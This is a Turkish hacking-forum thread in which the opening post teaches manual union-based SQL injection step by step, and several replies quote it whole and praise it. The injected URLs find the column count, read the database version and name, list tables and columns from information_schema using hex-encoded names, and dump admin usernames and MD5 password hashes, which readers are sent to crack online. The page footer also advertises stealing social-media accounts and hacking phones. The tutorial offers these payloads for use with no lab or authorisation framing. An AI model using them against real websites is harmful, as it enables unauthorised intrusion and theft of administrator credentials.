Kullanıcıların Dikkatine!

Konularda yapılan kısaltmalı ve geçiştirilmiş mesajlar (adsadas, haha, sjsksjsdjks, asdsd, nokta, random, sayı vb.) yasaklanma sebebidir. Mağduriyet yaşanmaması için bu duruma dikkat etmelisiniz.

Daha Fazlası

Hacktivizm Online

Hacktivizm sitesi hack kültürünü benimsemiş kişiler tarafından 2020 yılında kuruldu. Kuruluş amacı Türkiye'nin en büyük hack forumu olmak ve bilgi alışverişinde bulunmaktır.

Daha Fazlası

Konu Açarken Dikkat Edilmesi Gerekenler

Forumda oluşan / oluşması öngörülen görüntü kirliliğine engel olmak ve başlıkların daha temiz dil ile açılması amacıyla kurallarımıza bazı bağımlı / bağımsız maddeler eklemek durumundayız.

Daha Fazlası

Manuel SQL Injection Nasıl Yapılır

RedEnergy

Altın Üye
Katılım
31 Mart 2021
Mesajlar
648
Tepkime puanı
1,121
İlgi Alanlarınız
Sosyal medya uzmanlığı,Webtasarım
Cinsiyet
  1. Erkek
Evet şimdi manuel SQL Injection nasıl sömürülür başlayalım.

site.com/page.php?id=5 adresine gidiyorum.

Sonuna bir tırnak (‘) koydum.

Error :You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”’ at line 1
Evet hata aldık. Sitemizde bir SQL injection var.

Şimdi kolon sayısını bulacağız.

site.com/page.php?id=5+order+by+15 yazıyorum ve site

Error :Unknown column ’15’ in ‘order clause’

hatası veriyor. Bu sayıyı düşürmemiz gerekiyor. Sırasıyla düşüyoruz.

  • site.com/page.php?id=5+order+by+14 hata
  • site.com/page.php?id=5+order+by+13 hata
  • site.com/page.php?id=5+order+by+12 hata
  • site.com/page.php?id=5+order+by+11 hata
  • site.com/page.php?id=5+order+by+10 hata
.. hata

5’e geldiğimde hata almıyorum. Demek ki kolon sayımız 5. Bu siteyle alakalı bir durum.

Her sitede farklıdır. Sizler de kendi test ettiğiniz sitede deneyiniz.



Site.com/page.php?id=5+union+select+1,2,3,4,5

bu sefer union+select yazdık.

Site.com/page.php?id=-5+union+select+1,version(),3,4,5

Şimdiyse 2 yerine version() yazıyoruz. İsterseniz 3 yerine de yazabilirsiniz farketmez.



10.1.48-MariaDB
Karşıma böyle bir yazı geldi. Versiyonumuzu öğrenmiş olduk.

Site.com/page.php?id=-5+union+select+1,database(),3,4,5 yazıyoruz ve karşımıza databasemizin ismi geliyor.

https://www.rapidtables.com/convert/number/ascii-to-hex.html

Bu siteye gidip çekmek istediğimiz veri tabanı adını hex koduna dönüştürüyoruz.

63756c6f736d75735f6d757363756c başına 0x koyuyoruz.

site.com/page.php?id=-5+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=0x63756C6F736D75735F6D757363756C
evet tablolarımız gözüktü.



admin,caseofmonth,category,delegates,documents,faculty,gallery,homepageimg

,img_category,imggal,imguploads,ipadd,loginip,message,news,newsletter,page,
pages,photo,quicklinks,slider,socialmedia,testimonials,videos


Ben admin tablosunu çekeceğim için admin yazısını alıp hex koduna çevirip başına 0x koyuyorum.

Site.com/page.php?id=-5+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=0x63756C6F736D75735F6D757363756C+and+table_name=0x61646D696E


entry_id,user_id,password,type,status
Evet karşımıza bunlar geldi.

Site.com/page.php?id=-5+union+select+1,(user_id),(password),4,5+from+admin



user_id veya password yerine entry_id,user_id,password,type,status buradan birini yazabilirsiniz.

Veriler karşımıza geldi.



Ekran-goruntusu-2020-12-09-220125.png


Altta ki şifremiz md5 ile şifrelenmiş bir şifre.

https://crackstation.net/ gibi sitelerden bulmaya çalışabilirsiniz.

Manuel SQL İnjection konumuzun sonuna geldik. Okuduğunuz için teşekkürler.
 

nightstalker

Bronz Üye
Katılım
11 Nisan 2021
Mesajlar
273
Tepkime puanı
179
İlgi Alanlarınız
elektronik
Cinsiyet
  1. Erkek
Evet şimdi manuel SQL Injection nasıl sömürülür başlayalım.

site.com/page.php?id=5 adresine gidiyorum.

Sonuna bir tırnak (‘) koydum.


Evet hata aldık. Sitemizde bir SQL injection var.

Şimdi kolon sayısını bulacağız.

site.com/page.php?id=5+order+by+15 yazıyorum ve site

Error :Unknown column ’15’ in ‘order clause’

hatası veriyor. Bu sayıyı düşürmemiz gerekiyor. Sırasıyla düşüyoruz.

  • site.com/page.php?id=5+order+by+14 hata
  • site.com/page.php?id=5+order+by+13 hata
  • site.com/page.php?id=5+order+by+12 hata
  • site.com/page.php?id=5+order+by+11 hata
  • site.com/page.php?id=5+order+by+10 hata
.. hata

5’e geldiğimde hata almıyorum. Demek ki kolon sayımız 5. Bu siteyle alakalı bir durum.

Her sitede farklıdır. Sizler de kendi test ettiğiniz sitede deneyiniz.



Site.com/page.php?id=5+union+select+1,2,3,4,5

bu sefer union+select yazdık.

Site.com/page.php?id=-5+union+select+1,version(),3,4,5

Şimdiyse 2 yerine version() yazıyoruz. İsterseniz 3 yerine de yazabilirsiniz farketmez.



10.1.48-MariaDB
Karşıma böyle bir yazı geldi. Versiyonumuzu öğrenmiş olduk.

Site.com/page.php?id=-5+union+select+1,database(),3,4,5 yazıyoruz ve karşımıza databasemizin ismi geliyor.

https://www.rapidtables.com/convert/number/ascii-to-hex.html

Bu siteye gidip çekmek istediğimiz veri tabanı adını hex koduna dönüştürüyoruz.

63756c6f736d75735f6d757363756c başına 0x koyuyoruz.


evet tablolarımız gözüktü.



admin,caseofmonth,category,delegates,documents,faculty,gallery,homepageimg

,img_category,imggal,imguploads,ipadd,loginip,message,news,newsletter,page,
pages,photo,quicklinks,slider,socialmedia,testimonials,videos


Ben admin tablosunu çekeceğim için admin yazısını alıp hex koduna çevirip başına 0x koyuyorum.




entry_id,user_id,password,type,status
Evet karşımıza bunlar geldi.

Site.com/page.php?id=-5+union+select+1,(user_id),(password),4,5+from+admin



user_id veya password yerine entry_id,user_id,password,type,status buradan birini yazabilirsiniz.

Veriler karşımıza geldi.



Ekran-goruntusu-2020-12-09-220125.png


Altta ki şifremiz md5 ile şifrelenmiş bir şifre.

https://crackstation.net/ gibi sitelerden bulmaya çalışabilirsiniz.

Manuel SQL İnjection konumuzun sonuna geldik. Okuduğunuz için teşekkürler.
Es
 
Katılım
30 Mart 2021
Mesajlar
1,240
Tepkime puanı
10,211
Konum
Ubuntu
İlgi Alanlarınız
Klavye ve fare
Cinsiyet
  1. Erkek
Eline Sağlık dostum güzel anlatım olmuş klavyene taş değmesin inşallah 😂😂 Kadir gecen mübarek olsun
 

emyounoone

Uzman Üye
Katılım
23 Aralık 2020
Mesajlar
245
Tepkime puanı
470
İlgi Alanlarınız
Deface
Siber Güvenlik
Cinsiyet
  1. Erkek
Evet şimdi manuel SQL Injection nasıl sömürülür başlayalım.

site.com/page.php?id=5 adresine gidiyorum.

Sonuna bir tırnak (‘) koydum.


Evet hata aldık. Sitemizde bir SQL injection var.

Şimdi kolon sayısını bulacağız.

site.com/page.php?id=5+order+by+15 yazıyorum ve site

Error :Unknown column ’15’ in ‘order clause’

hatası veriyor. Bu sayıyı düşürmemiz gerekiyor. Sırasıyla düşüyoruz.

  • site.com/page.php?id=5+order+by+14 hata
  • site.com/page.php?id=5+order+by+13 hata
  • site.com/page.php?id=5+order+by+12 hata
  • site.com/page.php?id=5+order+by+11 hata
  • site.com/page.php?id=5+order+by+10 hata
.. hata

5’e geldiğimde hata almıyorum. Demek ki kolon sayımız 5. Bu siteyle alakalı bir durum.

Her sitede farklıdır. Sizler de kendi test ettiğiniz sitede deneyiniz.



Site.com/page.php?id=5+union+select+1,2,3,4,5

bu sefer union+select yazdık.

Site.com/page.php?id=-5+union+select+1,version(),3,4,5

Şimdiyse 2 yerine version() yazıyoruz. İsterseniz 3 yerine de yazabilirsiniz farketmez.



10.1.48-MariaDB
Karşıma böyle bir yazı geldi. Versiyonumuzu öğrenmiş olduk.

Site.com/page.php?id=-5+union+select+1,database(),3,4,5 yazıyoruz ve karşımıza databasemizin ismi geliyor.

https://www.rapidtables.com/convert/number/ascii-to-hex.html

Bu siteye gidip çekmek istediğimiz veri tabanı adını hex koduna dönüştürüyoruz.

63756c6f736d75735f6d757363756c başına 0x koyuyoruz.


evet tablolarımız gözüktü.



admin,caseofmonth,category,delegates,documents,faculty,gallery,homepageimg

,img_category,imggal,imguploads,ipadd,loginip,message,news,newsletter,page,
pages,photo,quicklinks,slider,socialmedia,testimonials,videos


Ben admin tablosunu çekeceğim için admin yazısını alıp hex koduna çevirip başına 0x koyuyorum.




entry_id,user_id,password,type,status
Evet karşımıza bunlar geldi.

Site.com/page.php?id=-5+union+select+1,(user_id),(password),4,5+from+admin



user_id veya password yerine entry_id,user_id,password,type,status buradan birini yazabilirsiniz.

Veriler karşımıza geldi.



Ekran-goruntusu-2020-12-09-220125.png


Altta ki şifremiz md5 ile şifrelenmiş bir şifre.

https://crackstation.net/ gibi sitelerden bulmaya çalışabilirsiniz.

Manuel SQL İnjection konumuzun sonuna geldik. Okuduğunuz için teşekkürler.
e.s güzel anlatım
 

RedEnergy

Altın Üye
Katılım
31 Mart 2021
Mesajlar
648
Tepkime puanı
1,121
İlgi Alanlarınız
Sosyal medya uzmanlığı,Webtasarım
Cinsiyet
  1. Erkek

Battalgazi

Kayıtlı Üye
Katılım
1 Mayıs 2021
Mesajlar
72
Tepkime puanı
130
İlgi Alanlarınız
Web hacking
Auto Exploit
Cinsiyet
  1. Erkek
Yararlı teşekkürler
 

B4rbarossa

Dododotçu
Kayıtlı Üye
Katılım
21 Aralık 2020
Mesajlar
75
Tepkime puanı
111
Konum
BURSA
İlgi Alanlarınız
Patlat metoo aaağağaaaaa
Cinsiyet
  1. Erkek
Birkaç yer gözüme çarptı ama olur gibi e.s :coffee:
 

KocaReis

Developer
Katılım
26 Ağustos 1971
Mesajlar
838
Tepkime puanı
2,656
eline sağlık kardeşim
 

Nevermind

Elmas
Katılım
15 Şubat 2023
Mesajlar
1,407
Tepkime puanı
9,983
Konum
403 Forbidden
İlgi Alanlarınız
Hesapların
Cinsiyet
  1. Erkek
Evet şimdi manuel SQL Injection nasıl sömürülür başlayalım.

site.com/page.php?id=5 adresine gidiyorum.

Sonuna bir tırnak (‘) koydum.


Evet hata aldık. Sitemizde bir SQL injection var.

Şimdi kolon sayısını bulacağız.

site.com/page.php?id=5+order+by+15 yazıyorum ve site

Error :Unknown column ’15’ in ‘order clause’

hatası veriyor. Bu sayıyı düşürmemiz gerekiyor. Sırasıyla düşüyoruz.

  • site.com/page.php?id=5+order+by+14 hata
  • site.com/page.php?id=5+order+by+13 hata
  • site.com/page.php?id=5+order+by+12 hata
  • site.com/page.php?id=5+order+by+11 hata
  • site.com/page.php?id=5+order+by+10 hata
.. hata

5’e geldiğimde hata almıyorum. Demek ki kolon sayımız 5. Bu siteyle alakalı bir durum.

Her sitede farklıdır. Sizler de kendi test ettiğiniz sitede deneyiniz.



Site.com/page.php?id=5+union+select+1,2,3,4,5

bu sefer union+select yazdık.

Site.com/page.php?id=-5+union+select+1,version(),3,4,5

Şimdiyse 2 yerine version() yazıyoruz. İsterseniz 3 yerine de yazabilirsiniz farketmez.



10.1.48-MariaDB
Karşıma böyle bir yazı geldi. Versiyonumuzu öğrenmiş olduk.

Site.com/page.php?id=-5+union+select+1,database(),3,4,5 yazıyoruz ve karşımıza databasemizin ismi geliyor.

https://www.rapidtables.com/convert/number/ascii-to-hex.html

Bu siteye gidip çekmek istediğimiz veri tabanı adını hex koduna dönüştürüyoruz.

63756c6f736d75735f6d757363756c başına 0x koyuyoruz.


evet tablolarımız gözüktü.



admin,caseofmonth,category,delegates,documents,faculty,gallery,homepageimg

,img_category,imggal,imguploads,ipadd,loginip,message,news,newsletter,page,
pages,photo,quicklinks,slider,socialmedia,testimonials,videos


Ben admin tablosunu çekeceğim için admin yazısını alıp hex koduna çevirip başına 0x koyuyorum.




entry_id,user_id,password,type,status
Evet karşımıza bunlar geldi.

Site.com/page.php?id=-5+union+select+1,(user_id),(password),4,5+from+admin



user_id veya password yerine entry_id,user_id,password,type,status buradan birini yazabilirsiniz.

Veriler karşımıza geldi.



Ekran-goruntusu-2020-12-09-220125.png


Altta ki şifremiz md5 ile şifrelenmiş bir şifre.

https://crackstation.net/ gibi sitelerden bulmaya çalışabilirsiniz.

Manuel SQL İnjection konumuzun sonuna geldik. Okuduğunuz için teşekkürler.
Eline sağlık
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hack Forum
Hacktivizm, 2020 yılında kurulmuş bir siber güvenlik forum sitesidir aynı zamanda hack forumu,hack sitesi,hack forum ve Türk hack forumudur. Hack forum aramalarında ilk sayfada olan bu hack forum sitesi gün geçtikçe gelişmektedir. Hack Forum kelimesinin anlamı ise, hacker kültürü ve bilgisayar güvenliği ile ilgili tartışmalara adanmış bir İnternet forumudur. Web sitesi, analiz şirketi Alexa Internet tarafından web trafiği açısından "Hacking" kategorisinde bir numaralı web sitesi olarak yer almaktadır.

Telefon Takip - İphone Hackleme - PDF Şifre Kırma - Telefon Hackleme - İnstagram Hesap Çalma - Twitter Hesap Çalma - Facebook Hesap Çalma - Wifi Şifre Kırma - Telefon Şifresi Kırma

Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst